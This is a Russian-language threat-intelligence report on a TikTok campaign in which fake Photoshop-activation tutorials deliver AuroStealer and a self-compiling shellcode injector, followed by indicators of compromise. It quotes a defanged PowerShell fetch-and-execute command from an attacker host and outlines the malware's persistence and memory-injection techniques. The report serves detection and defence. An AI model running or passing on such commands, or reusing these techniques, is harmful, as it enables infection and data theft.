Социальные сети становятся новым фронтом кибератак, где злоумышленники используют доверие пользователей к визуальному контенту для распространения вредоносного ПО. Недавно обнаруженная кампания в TikTok демонстрирует изощренный подход, когда под видом обучающих роликов о бесплатной активации лицензионного софта распространяются многоступенчатые вредоносные программы.
Описание
Атака начинается с видео, где автор предлагает простой способ бесплатной активации Photoshop. Ролик, набравший более 500 лайков, содержит инструкции по запуску PowerShell с правами администратора и выполнению команды, которая загружает и исполняет вредоносный скрипт. Техника напоминает сценарий атаки ClickFix, где социальная инженерия сочетается с техническими методами компрометации.
Исполняемая команда iex (irm slmgr[.]win/photoshop) запускает PowerShell-скрипт, который 63 антивирусными движками распознается как подозрительный. Скрипт загружает следующий этап атаки - файл updater.exe с хостера https://file-epq[.]pages[.]dev/, одновременно создавая задание в планировщике задач для обеспечения устойчивости в системе.
Механизм персистентности реализован через случайный выбор имени задачи из предопределенного списка, включающего легитимные названия системных процессов, что затрудняет обнаружение. Среди используемых масок: MicrosoftEdgeUpdateTaskMachineCore, GoogleUpdateTaskMachineCore, AdobeUpdateTask и другие. Это позволяет зловреду маскироваться под обычные системные процессы и избегать подозрений со стороны пользователей.
Второй этап атаки представляет собой AuroStealer - вредоносную программу, специализирующуюся на краже данных. Однако атака на этом не заканчивается. Третий компонент source.exe использует продвинутую технику компиляции кода непосредственно во время выполнения.
Этот метод, известный как "самокомпилирующееся вредоносное ПО", использует встроенный компилятор C# для генерации кода класса, предназначенного для инъекции shellcode в память. Код использует низкоуровневые API функции Windows - VirtualAlloc для выделения памяти, CreateThread для создания потока выполнения и WaitForSingleObject для синхронизации. Такой подход позволяет обходить традиционные сигнатурные методы обнаружения, поскольку основной вредоносный код генерируется непосредственно в системе жертвы.
Исследование показало, что это не единичный случай. Обнаружены дополнительные видео из той же кампании, продвигающие "взлом" другого программного обеспечения. Все они используют одинаковую технику и инфраструктуру, что указывает на скоординированные действия одной группы злоумышленников.
Индикаторы компрометации
URLs
- https://file-epq.pages.dev/
- https://vm.tiktok.com/ZGdaC7EQY/
- https://vm.tiktok.com/ZGdaCkbEF/
- https://vm.tiktok.com/ZGdaX8jVq/
- slmgr.win/photoshop
SHA256
- 58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8
- 6d897b5661aa438a96ac8695c54b7c4f3a1fbf1b628c8d2011e50864860c6b23
- db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011
